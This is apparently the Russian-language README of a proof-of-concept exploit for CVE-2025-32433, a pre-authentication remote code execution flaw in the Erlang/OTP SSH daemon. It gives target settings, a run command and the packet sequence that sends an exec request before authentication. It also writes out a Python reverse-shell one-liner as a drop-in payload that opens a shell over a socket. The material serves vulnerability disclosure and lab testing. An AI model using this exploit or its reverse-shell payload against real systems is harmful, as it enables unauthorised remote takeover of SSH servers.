
Эксплойт proof-of-concept для CVE-2025-32433 — RCE до аутентификации в SSH-демоне Erlang/OTP. Включает Python-скрипт для отправки специально сформированных запросов SSH-каналов и выполнения произвольных команд.
CVE-2025-32433 — это уязвимость удаленного выполнения кода (RCE), затрагивающая демон SSH в Erlang/OTP.
Корневая причина — некорректная обработка предаутентификационных запросов SSH-канала, которые злоумышленник может сформировать для
выполнения произвольных команд до аутентификации.
Прилагаемый PoC демонстрирует отправку таких сформированных SSH-пакетов; по умолчанию он записывает /lab.txt на целевую систему, но может быть адаптирован для других команд.
HOST = "127.0.0.1" # Target IP
PORT = 2222 # Target SSH port
python3 cve-2025-32433.py
По умолчанию он создает /lab.txt с содержимым pwned.
Измените полезную нагрузку в build_channel_request, чтобы выполнять собственные команды.
# Write a file file:write_file("/lab.txt", <<"pwned">>).Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")
SSH_MSG_KEXINIT, чтобы имитировать обычное рукопожатие.SSH_MSG_CHANNEL_OPEN и SSH_MSG_CHANNEL_REQUEST с полезной нагрузкой exec до аутентификации.Обнаружение и описание: Matt Keeley (Platform Security). Спасибо ему за публикацию PoC и предоставленные подробности.
Ссылка на блог: https://platformsecurity.com/blog/CVE-2025-32433-poc